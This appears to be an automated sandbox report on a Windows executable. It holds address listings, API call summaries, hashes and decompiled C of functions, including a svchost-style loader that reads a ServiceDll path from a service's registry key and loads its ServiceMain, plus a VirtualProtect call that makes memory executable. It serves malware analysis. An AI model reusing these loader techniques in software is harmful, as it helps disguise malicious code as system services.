                            0x008b1d33
                            0x008b1d3a
                            0x008b1d41
                            0x008b1d48
                            0x008b1d4f
                            0x008b1d56
                            0x008b1d5d
                            0x008b1d64
                            0x008b1d6b
                            0x008b1d72
                            0x008b1d79
                            0x008b1d80
                            0x008b1d87
                            0x008b1d8e
                            0x008b1d95
                            0x008b1d9c
                            0x008b1da3
                            0x008b1daa
                            0x008b1db1
                            0x008b1db8
                            0x008b1dbf
                            0x008b1dc6
                            0x008b1dcd
                            0x008b1dd4
                            0x008b1ddb
                            0x008b1de2
                            0x008b1de9
                            0x008b1df0
                            0x008b1df7
                            0x008b1dfe
                            0x008b1e05
                            0x008b1e0c
                            0x008b1e13
                            0x008b1e1a
                            0x008b1e21
                            0x008b1e28
                            0x008b1e2f
                            0x008b1e36
                            0x008b1e3d
                            0x008b1e44
                            0x008b1e4b
                            0x008b1e52
                            0x008b1e59
                            0x008b1e60
                            0x008b1e67
                            0x008b1e6e
                            0x008b1e75
                            0x008b1e7c
                            0x008b1e83
                            0x008b1e8a
                            0x008b1e91
                            0x008b1e98
                            0x008b1e9f
                            0x008b1ea6
                            0x008b1ead
                            0x008b1eb4
                            0x008b1ebb
                            0x008b1ec2
                            0x008b1ec9
                            0x008b1ed0
                            0x008b1ed7
                            0x008b1ede
                            0x008b1ee5
                            0x008b1eec
                            0x008b1ef3
                            0x008b1efa
                            0x008b1f01
                            0x008b1f08
                            0x008b1f0f
                            0x008b1f16
                            0x008b1f1d
                            0x008b1f24
                            0x008b1f2b
                            0x008b1f32
                            0x008b1f39
                            0x008b1f40
                            0x008b1f47
                            0x008b1f4e
                            0x008b1f55
                            0x008b1f5c
                            0x008b1f63
                            0x008b1f6a
                            0x008b1f71
                            0x008b1f78
                            0x008b1f7f
                            0x008b1f86
                            0x008b1f8d
                            0x008b1f94
                            0x008b1f9b
                            0x008b1fa2
                            0x008b1fa9
                            0x008b1fb0
                            0x008b1fb7
                            0x008b1fbe
                            0x008b1fc5
                            0x008b1fcc
                            0x008b1fd3
                            0x008b1fda
                            0x008b1fe1
                            0x008b1fe8
                            0x008b1fef
                            0x008b1ff6
                            0x008b1ffd
                            0x008b2004
                            0x008b200b
                            0x008b2012
                            0x008b2019
                            0x008b2020
                            0x008b2027
                            0x008b202e
                            0x008b2035
                            0x008b203c
                            0x008b2043
                            0x008b204a
                            0x008b2051
                            0x008b2058
                            0x008b205f
                            0x008b2066
                            0x008b206d
                            0x008b2074
                            0x008b207b
                            0x008b2082
                            0x008b2089
                            0x008b2090
                            0x008b2097
                            0x008b209e
                            0x008b20a5
                            0x008b20ac
                            0x008b20b3
                            0x008b20ba
                            0x008b20c1
                            0x008b20c8
                            0x008b20cf
                            0x008b20d6
                            0x008b20dd
                            0x008b20e4
                            0x008b20eb
                            0x008b20f2
                            0x008b20f9
                            0x008b2100
                            0x008b2107
                            0x008b210e
                            0x008b2115
                            0x008b211c
                            0x008b2123
                            0x008b212a
                            0x008b2131
                            0x008b2138
                            0x008b213f
                            0x008b2146
                            0x008b214d
                            0x008b2154
                            0x008b215b
                            0x008b2162
                            0x008b2169
                            0x008b2170
                            0x008b2177
                            0x008b217e
                            0x008b2185
                            0x008b218c
                            0x008b2193
                            0x008b219a
                            0x008b21a1
                            0x008b21a8
                            0x008b21af
                            0x008b21b6
                            0x008b21bd
                            0x008b21c4
                            0x008b21cb
                            0x008b21d2
                            0x008b21d9
                            0x008b21e0
                            0x008b21e7
                            0x008b21ee
                            0x008b21f5
                            0x008b21fc
                            0x008b2203
                            0x008b220a
                            0x008b2211
                            0x008b2218
                            0x008b221f
                            0x008b2226
                            0x008b222d
                            0x008b2234
                            0x008b223b
                            0x008b2242
                            0x008b2249
                            0x008b2250
                            0x008b2257
                            0x008b225e
                            0x008b2265
                            0x008b226c
                            0x008b2273
                            0x008b227a
                            0x008b2281
                            0x008b2288
                            0x008b228f
                            0x008b2296
                            0x008b229d
                            0x008b22a4
                            0x008b22ab
                            0x008b22b2
                            0x008b22b9
                            0x008b22c0
                            0x008b22c7
                            0x008b22ce
                            0x008b22d5
                            0x008b22dc
                            0x008b22e3
                            0x008b22ea
                            0x008b22f1
                            0x008b22f8
                            0x008b22ff
                            0x008b2306
                            0x008b230d
                            0x008b2314
                            0x008b231b
                            0x008b2322
                            0x008b2329
                            0x008b2330
                            0x008b2337
                            0x008b233e
                            0x008b2345
                            0x008b234c
                            0x008b2353
                            0x008b235a
                            0x008b2361
                            0x008b2368
                            0x008b236f
                            0x008b2376
                            0x008b237d
                            0x008b2384
                            0x008b238b
                            0x008b2392
                            0x008b2399
                            0x008b23a0
                            0x008b23a7
                            0x008b23ae
                            0x008b23b5
                            0x008b23bc
                            0x008b23c3
                            0x008b23ca
                            0x008b23d1
                            0x008b23d8
                            0x008b23df
                            0x008b23e6
                            0x008b23ed
                            0x008b23f1
                            0x008b23f5
                            0x008b23f9
                            0x008b23fd
                            0x008b2401
                            0x008b2405
                            0x008b2409
                            0x008b240d
                            0x008b2411
                            0x008b2415
                            0x008b2419
                            0x008b241d
                            0x008b2421
                            0x008b2425
                            0x008b2429
                            0x008b242d
                            0x008b2431
                            0x008b2435
                            0x008b2439
                            0x008b243d
                            0x008b2441
                            0x008b2445
                            0x008b2449
                            0x008b244d
                            0x008b2451
                            0x008b2455
                            0x008b2459
                            0x008b245d
                            0x008b2461
                            0x008b2465
                            0x008b2469
                            0x008b246d
                            0x008b2471
                            0x008b2475
                            0x008b2479
                            0x008b247d
                            0x008b2481
                            0x008b2485
                            0x008b2489
                            0x008b248d
                            0x008b2491
                            0x008b2495
                            0x008b2499
                            0x008b249d
                            0x008b24a1
                            0x008b24a5
                            0x008b24a9
                            0x008b24ad
                            0x008b24b1
                            0x008b24b5
                            0x008b24b9
                            0x008b24bd
                            0x008b24c1
                            0x008b24c5
                            0x008b24c9
                            0x008b24cd
                            0x008b24d1
                            0x008b24d5
                            0x008b24d9
                            0x008b24dd
                            0x008b24e1
                            0x008b24e5
                            0x008b24e9
                            0x008b24ed
                            0x008b24f1
                            0x008b24f5
                            0x008b24f9
                            0x008b24fd
                            0x008b2501
                            0x008b2505
                            0x008b2509
                            0x008b250d
                            0x008b2511
                            0x008b2515
                            0x008b2519
                            0x008b251d
                            0x008b2521
                            0x008b2525
                            0x008b2529
                            0x008b252d
                            0x008b2531
                            0x008b2535
                            0x008b2539
                            0x008b253d
                            0x008b2541
                            0x008b2545
                            0x008b2549
                            0x008b254d
                            0x008b2551
                            0x008b2555
                            0x008b2559
                            0x008b255d
                            0x008b2561
                            0x008b2565
                            0x008b2569
                            0x008b256d
                            0x008b2571
                            0x008b2575
                            0x008b2579
                            0x008b257d
                            0x008b2581
                            0x008b2585
                            0x008b2595
                            0x008b259b
                            0x008b259f
                            0x008b25a3
                            0x008b25a7
                            0x008b25ab
                            0x008b25af
                            0x008b25b9
                            0x008b25c3
                            0x008b25cb
                            0x008b25d8
                            0x008b25e4
                            0x008b25f1
                            0x008b25fe
                            0x008b2609
                            0x008b260f
                            0x008b2621
                            0x008b264a
                            0x008b261e
                            0x008b261e
                            0x008b266c
                            0x008b270f
                            0x008b2738
                            0x008b2746
                            0x008b274c
                            0x008b275e
                            0x008b277d
                            0x008b279e
                            0x008b27a7
                            0x008b27be
                            0x008b275b
                            0x00000000
                            0x008b275b
                            0x00000000
                            0x008b27c0
                            0x00000000
                            0x008b27c6
                            0x00000000
                            0x008b27c6
                            0x008b277d
                            0x00000000
                            0x008b26e6
                            0x008b26ef
                            0x00000000
                            0x008b26ef
                            0x008b266c

                            APIs
                            • VirtualProtect.KERNELBASE(000000E9,00000252,00000040,?), ref: 008B270F
                            • GetDC.USER32(00000000), ref: 008B2731
                            • GrayStringA.USER32(00000000), ref: 008B2738
                            • MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 008B2746
                            • lstrcmpiW.KERNEL32(?,008C2198), ref: 008B2775
                            • lstrcmpiW.KERNEL32(?,008C21A0), ref: 008B278E
                              • Part of subcall function 008B15A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 008B15C9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: lstrcmpi$GrayMessageOpenProtectStringVirtual
                            • String ID: $"$"$$$$$*$*$*$*$*$+$-$.$0$0$0$0$1$2$2$2$2$2$2$2$2$2$3$3$3$3$;$;$;$<$<$>$@$@$@$@$@$A$A$A$B$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$H$H$H$H$H$H$I$K$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$O$P$P$P$P$P$P$P$R$S$S$T$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$W$W$W$W$W$W$W$X$X$Y$Y$Y$Z$Z$[$]$]$]$]$]$^$^$^$^$_$_$a$d$d$d$e$e$f$f$f$f$f$f$f$f$h$h$h$h$h$h$h$h$h$h$h$h$j$j$j$j$j$j$j$j$j$j$k$r$r$s$s$t$u$u$u$u$u$u$u$u$x
                            • API String ID: 1346567926-443151527
                            • Opcode ID: 11c69762e517d8a722514422e8c93ee9937b6b8403c7fdc89a259c39131fdb1b
                            • Instruction ID: a745eb4c7d321725896594286b63aa3367ba09dc96a23c597be8188af7e50f28
                            • Opcode Fuzzy Hash: 11c69762e517d8a722514422e8c93ee9937b6b8403c7fdc89a259c39131fdb1b
                            • Instruction Fuzzy Hash: 86C27B2090CBE9C9DB32C27C9C587CDAE611B27325F5843D9D1E83A2D2C7B50B85DB66
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B6347, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E008B6347(intOrPtr __ebx, void* __edx, void* __edi, long _a4) {
				void* __esi;
				void* _t2;
				void* _t6;
				void* _t7;
				void* _t11;
				long _t18;
				void* _t22;
				long _t25;

				_t23 = __edi;
				_t22 = __edx;
				_t14 = __ebx;
				_t25 = _a4;
				if(_t25 > 0xffffffe0) {
					E008B5360(_t2, _t25);
					 *((intOrPtr*)(E008B5065(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				_push(__ebx);
				_push(__edi);
				while(1) {
					_t6 =  *0x8c329c; // 0x10e0000
					_t27 = _t6;
					if(_t6 == 0) {
						E008B379A(_t14, _t22, _t23, _t25, _t27);
						E008B37F7(_t14, _t22, _t23, _t25, 0x1e);
						E008B2EE5(0xff);
						_t6 =  *0x8c329c; // 0x10e0000
					}
					if(_t25 == 0) {
						_t18 = 1;
						__eflags = 1;
					} else {
						_t18 = _t25;
					}
					_t7 = RtlAllocateHeap(_t6, 0, _t18); // executed
					_t23 = _t7;
					if(_t23 != 0) {
						break;
					}
					_t14 = 0xc;
					if( *0x8c40d0 == _t7) {
						 *((intOrPtr*)(E008B5065(__eflags))) = _t14;
						L12:
						 *((intOrPtr*)(E008B5065(_t31))) = _t14;
						break;
					}
					_t11 = E008B5360(_t7, _t25);
					_t31 = _t11;
					if(_t11 != 0) {
						continue;
					}
					goto L12;
				}
				return _t23;
			}











                            0x008b6347
                            0x008b6347
                            0x008b6347
                            0x008b634b
                            0x008b6351
                            0x008b63c3
                            0x008b63ce
                            0x008b63d4
                            0x00000000
                            0x008b63d4
                            0x008b6353
                            0x008b6354
                            0x008b6355
                            0x008b6355
                            0x008b635a
                            0x008b635c
                            0x008b635e
                            0x008b6365
                            0x008b636f
                            0x008b6374
                            0x008b637a
                            0x008b637d
                            0x008b6385
                            0x008b6385
                            0x008b637f
                            0x008b637f
                            0x008b637f
                            0x008b638a
                            0x008b6390
                            0x008b6394
                            0x00000000
                            0x00000000
                            0x008b6398
                            0x008b639f
                            0x008b63b3
                            0x008b63b5
                            0x008b63ba
                            0x00000000
                            0x008b63ba
                            0x008b63a2
                            0x008b63a8
                            0x008b63aa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x008b63ac
                            0x00000000

                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 008B635E
                              • Part of subcall function 008B379A: __NMSG_WRITE.LIBCMT ref: 008B37C1
                              • Part of subcall function 008B379A: __NMSG_WRITE.LIBCMT ref: 008B37CB
                            • __NMSG_WRITE.LIBCMT ref: 008B6365
                              • Part of subcall function 008B37F7: GetModuleFileNameW.KERNEL32(00000000,008C35EA,00000104,00000000,00000000,00000000), ref: 008B3889
                              • Part of subcall function 008B37F7: ___crtMessageBoxW.LIBCMT ref: 008B3937
                              • Part of subcall function 008B2EE5: ExitProcess.KERNEL32 ref: 008B2EF4
                              • Part of subcall function 008B5065: __getptd_noexit.LIBCMT ref: 008B5065
                            • RtlAllocateHeap.NTDLL(010E0000,00000000,00000001,00000000,00000000,00000000,?,008B434C,00000000,00000000,00000000,00000000,?,008B4201,00000018,008C11B8), ref: 008B638A
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateExitFileHeapMessageModuleNameProcess___crt__getptd_noexit
                            • String ID:
                            • API String ID: 3823847927-0
                            • Opcode ID: 6ec7e7bcd182336e33e859343cfa0a6d6f3b2435f83081451a19e1c459a82229
                            • Instruction ID: cf463df61ff782294ba3c29803e25f2f6a680f9f0fcd52adaed0f508a9975ce5
                            • Opcode Fuzzy Hash: 6ec7e7bcd182336e33e859343cfa0a6d6f3b2435f83081451a19e1c459a82229
                            • Instruction Fuzzy Hash: 6201F535244B15AAD6117B38AC02BEE73E8FF49764F190139F501CB382FFB99C1142A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 008B1450, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E008B1450(WCHAR* _a4) {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				int _v20;
				long _t65;

				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					_v12 = _v12 + 1;
					_v8 =  &(_v8[lstrlenW(_v8)]);
					_v8 =  &(_v8[1]);
				}
				_v16 = HeapAlloc(GetProcessHeap(), 0, 8 + _v12 * 8);
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					if(E008B1160(_v8, _v16 + _v12 * 8) != 0) {
						_v12 = _v12 + 1;
						_v8 =  &(_v8[lstrlenW(_v8)]);
						_v8 =  &(_v8[1]);
						continue;
					}
					HeapFree(GetProcessHeap(), 0, _v16);
					return 0;
				}
				 *(_v16 + _v12 * 8) = 0;
				 *(_v16 + 4 + _v12 * 8) = 0;
				_v20 = StartServiceCtrlDispatcherW(_v16);
				if(_v20 == 0) {
					_t65 = GetLastError();
					0x8b0000(_a4, _t65);
					0x8b0000("StartServiceCtrlDispatcherW failed to start %s: %u\n", _t65);
				}
				HeapFree(GetProcessHeap(), 0, _v16);
				return _v20;
			}








                            0x008b1456
                            0x008b145d
                            0x008b1464
                            0x008b146e
                            0x008b1471
                            0x008b1481
                            0x008b1494
                            0x008b149d
                            0x008b149d
                            0x008b14bc
                            0x008b14bf
                            0x008b14c9
                            0x008b14cc
                            0x008b14eb
                            0x008b150d
                            0x008b1520
                            0x008b1529
                            0x00000000
                            0x008b1529
                            0x008b14fa
                            0x00000000
                            0x008b1500
                            0x008b1534
                            0x008b1541
                            0x008b1553
                            0x008b155a
                            0x008b155c
                            0x008b1567
                            0x008b1572
                            0x008b1572
                            0x008b1584
                            0x00000000

                            APIs
                            • lstrlenW.KERNEL32(00000000), ref: 008B1488
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14AF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B14B6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B14F3
                            • HeapFree.KERNEL32(00000000), ref: 008B14FA
                            • lstrlenW.KERNEL32(00000000), ref: 008B1514
                            • StartServiceCtrlDispatcherW.ADVAPI32(00000000), ref: 008B154D
                            • GetLastError.KERNEL32 ref: 008B155C
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B157D
                            • HeapFree.KERNEL32(00000000), ref: 008B1584
                            Strings
                            • StartServiceCtrlDispatcherW failed to start %s: %u, xrefs: 008B156D
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Process$Freelstrlen$AllocCtrlDispatcherErrorLastServiceStart
                            • String ID: StartServiceCtrlDispatcherW failed to start %s: %u
                            • API String ID: 3118973391-2801566792
                            • Opcode ID: 5a57d0d45a630cbfcc9f9191d20d147928e6ae7f53b237613fb9037af871496e
                            • Instruction ID: 38355a1cc0cb3c84be2ea40f97b75c5f36500dbf53a1c74c6a0ba59b9a63592f
                            • Opcode Fuzzy Hash: 5a57d0d45a630cbfcc9f9191d20d147928e6ae7f53b237613fb9037af871496e
                            • Instruction Fuzzy Hash: 9341C8B4D00209FFDB14EFA4C958BAEBBB5FF48305F208199E545AB350D7359A41DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B10B0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 60memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E008B10B0(WCHAR* _a4) {
				long _v8;
				void* _v12;
				long _t25;
				long _t30;

				_v8 = 0;
				_v8 = ExpandEnvironmentStringsW(_a4, 0, _v8);
				if(_v8 != 0) {
					_t19 = _v8;
					_t9 = _t19 + 2; // 0x2
					_v12 = HeapAlloc(GetProcessHeap(), 0, _v8 + _t9);
					if(ExpandEnvironmentStringsW(_a4, _v12, _v8) != 0) {
						return _v12;
					}
					_t25 = GetLastError();
					0x8b0000(_a4, _t25);
					0x8b0000("cannot expand env vars in %s: %u\n", _t25);
					HeapFree(GetProcessHeap(), 0, _v12);
					return 0;
				}
				_t30 = GetLastError();
				0x8b0000(_a4, _t30);
				0x8b0000("cannot expand env vars in %s: %u\n", _t30);
				return 0;
			}







                            0x008b10b6
                            0x008b10cd
                            0x008b10d4
                            0x008b10f5
                            0x008b10f8
                            0x008b110c
                            0x008b1123
                            0x00000000
                            0x008b1157
                            0x008b1125
                            0x008b1130
                            0x008b113b
                            0x008b114d
                            0x00000000
                            0x008b1153
                            0x008b10d6
                            0x008b10e1
                            0x008b10ec
                            0x00000000

                            APIs
                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 008B10C7
                            • GetLastError.KERNEL32 ref: 008B10D6
                            • GetProcessHeap.KERNEL32(00000000,00000002), ref: 008B10FF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1106
                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000000), ref: 008B111B
                            • GetLastError.KERNEL32 ref: 008B1125
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1146
                            • HeapFree.KERNEL32(00000000), ref: 008B114D
                            Strings
                            • cannot expand env vars in %s: %u, xrefs: 008B1136
                            • cannot expand env vars in %s: %u, xrefs: 008B10E7
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$EnvironmentErrorExpandLastProcessStrings$AllocFree
                            • String ID: cannot expand env vars in %s: %u$cannot expand env vars in %s: %u
                            • API String ID: 3773870257-3849838887
                            • Opcode ID: a3c19922889e737f1f6cb10d266250579e07856bd4b7fb3a93b3117b8501bb32
                            • Instruction ID: 926809ebca4903144a78b4abc0277840de2aaecbb1f29d761a9879a22ddcc61c
                            • Opcode Fuzzy Hash: a3c19922889e737f1f6cb10d266250579e07856bd4b7fb3a93b3117b8501bb32
                            • Instruction Fuzzy Hash: 8411EF75504608BFDB04FBA4DC59FAE7B78FB08301F104559FA09D6250E630DA429B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B4121, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B4121(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                            0x008b4126
                            0x008b4136

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008B4F97,?,?,?,00000000), ref: 008B4126
                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 008B412F
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 5d40c689e1ac2f09ef9792fa887dbd7acda1dc2fc7d2ee4e6ed46eba9ac5ff27
                            • Instruction ID: 3656b69047e99df73e95d7613f21e9593f2662a4caeb853ae72a10ee072b9db6
                            • Opcode Fuzzy Hash: 5d40c689e1ac2f09ef9792fa887dbd7acda1dc2fc7d2ee4e6ed46eba9ac5ff27
                            • Instruction Fuzzy Hash: F9B09235044308BBCB002B99EC0AB59BF2DFB05652F004121F60D44071EB7254108A91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B40F0, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E008B40F0(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                            0x008b40fd

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(?,?,008B2A50,008B2A05), ref: 008B40F6
                            Memory Dump Source
                            • Source File: 00000001.00000002.251892270.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000001.00000002.251857321.00000000008B0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251930486.00000000008BD000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251942353.00000000008C2000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251954213.00000000008C5000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.251960100.00000000008C6000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 0f0f0aba76817cd017d4abe50258118c7133344f0810143abd1cf0f77c427edb
                            • Instruction ID: 84a3f6a4072d0a4f9fbd3a5d6d00896e2b0abd06702243dbaf1acfe37c9f66cb
                            • Opcode Fuzzy Hash: 0f0f0aba76817cd017d4abe50258118c7133344f0810143abd1cf0f77c427edb
                            • Instruction Fuzzy Hash: A1A0113000020CBB8B002B8AEC0A88ABF2CFA002A0B000020F80C00020EB22A8208A80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 008B1160, Relevance: 79.0, APIs: 35, Strings: 10, Instructions: 225memorystringregistryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E008B1160(WCHAR* _a4, WCHAR** _a8) {
				void* _v8;
				void* _v12;
				long _v16;
				struct HINSTANCE__* _v20;
				void* _v24;
				signed int _v28;
				WCHAR* _v32;
				_Unknown_base(*)()* _v36;
				void* _v40;
				int _v44;
				long _v48;
				int _t82;
				int _t83;
				int _t85;
				int _t86;
				long _t125;
				void* _t134;

				_v12 = 0;
				_v8 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v36 = 0;
				_v48 = 0;
				_t82 = lstrlenW(L"System\\CurrentControlSet\\Services");
				_t83 = lstrlenW("\\");
				_t85 = lstrlenW(_a4);
				_t86 = lstrlenW("\\");
				_t11 = lstrlenW(L"Parameters") + 1; // 0x1
				_v28 = _t82 + _t83 + _t85 + _t86 + _t11;
				_v8 = HeapAlloc(GetProcessHeap(), 0, _v28 << 1);
				lstrcpyW(_v8, L"System\\CurrentControlSet\\Services");
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, _a4);
				lstrcatW(_v8, "\\");
				lstrcatW(_v8, L"Parameters");
				 *((short*)(_v8 + _v28 * 2 - 2)) = 0;
				_v16 = RegOpenKeyExW(0x80000002, _v8, 0, 0x20019,  &_v12);
				if(_v16 == 0) {
					_v40 = E008B1000(_v12, L"ServiceDll");
					if(_v40 != 0) {
						_v32 = E008B10B0(_v40);
						if(_v32 != 0) {
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, 0,  &_v44);
							if(_v16 != 0) {
								L10:
								RegCloseKey(_v12);
								_v20 = LoadLibraryExW(_v32, 0, 8);
								if(_v20 != 0) {
									if(_v24 == 0) {
										_v36 = GetProcAddress(_v20, "ServiceMain");
									} else {
										_v36 = GetProcAddress(_v20, _v24);
									}
									if(_v36 != 0) {
										GetProcAddress(_v20, "SvchostPushServiceGlobals");
										 *_a8 = _a4;
										_a8[1] = _v36;
										_v48 = 1;
									} else {
										FreeLibrary(_v20);
									}
								} else {
									_t125 = GetLastError();
									0x8b0000(_v32, _t125);
									0x8b0000("failed to load library %s, err=%u\n", _t125);
								}
								goto L18;
							}
							_v28 = _v44 + 1;
							_v24 = HeapAlloc(GetProcessHeap(), 0, _v28);
							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, _v24,  &_v44);
							if(_v16 == 0) {
								 *((char*)(_v24 + _v28 - 1)) = 0;
								goto L10;
							}
							RegCloseKey(_v12);
							goto L18;
						}
						RegCloseKey(_v12);
						goto L18;
					}
					RegCloseKey(_v12);
					goto L18;
				} else {
					_t134 = _v8;
					0x8b0000(_t134, _v16);
					0x8b0000("cannot open key %s, err=%d\n", _t134);
					L18:
					HeapFree(GetProcessHeap(), 0, _v8);
					HeapFree(GetProcessHeap(), 0, _v40);
					HeapFree(GetProcessHeap(), 0, _v32);
					HeapFree(GetProcessHeap(), 0, _v24);
					return _v48;
				}
			}




















                            0x008b1167
                            0x008b116e
                            0x008b1175
                            0x008b117c
                            0x008b1183
                            0x008b118a
                            0x008b1191
                            0x008b1198
                            0x008b11a4
                            0x008b11b1
                            0x008b11bd
                            0x008b11ca
                            0x008b11dd
                            0x008b11e1
                            0x008b11f9
                            0x008b1205
                            0x008b1214
                            0x008b1222
                            0x008b1231
                            0x008b1240
                            0x008b124e
                            0x008b126d
                            0x008b1274
                            0x008b12a1
                            0x008b12a8
                            0x008b12c2
                            0x008b12c9
                            0x008b12f3
                            0x008b12fa
                            0x008b1358
                            0x008b135c
                            0x008b1370
                            0x008b1377
                            0x008b139a
                            0x008b13be
                            0x008b139c
                            0x008b13aa
                            0x008b13aa
                            0x008b13c5
                            0x008b13dc
                            0x008b13e8
                            0x008b13f0
                            0x008b13f3
                            0x008b13c7
                            0x008b13cb
                            0x008b13cb
                            0x008b1379
                            0x008b1379
                            0x008b1384
                            0x008b138f
                            0x008b138f
                            0x00000000
                            0x008b1377
                            0x008b1302
                            0x008b1318
                            0x008b1336
                            0x008b133d
                            0x008b1354
                            0x00000000
                            0x008b1354
                            0x008b1343
                            0x00000000
                            0x008b1343
                            0x008b12cf
                            0x00000000
                            0x008b12cf
                            0x008b12ae
                            0x00000000
                            0x008b1276
                            0x008b127a
                            0x008b127e
                            0x008b1289
                            0x008b13fa
                            0x008b1407
                            0x008b141a
                            0x008b142d
                            0x008b1440
                            0x008b144d
                            0x008b144d

                            APIs
                            • lstrlenW.KERNEL32(System\CurrentControlSet\Services), ref: 008B11A4
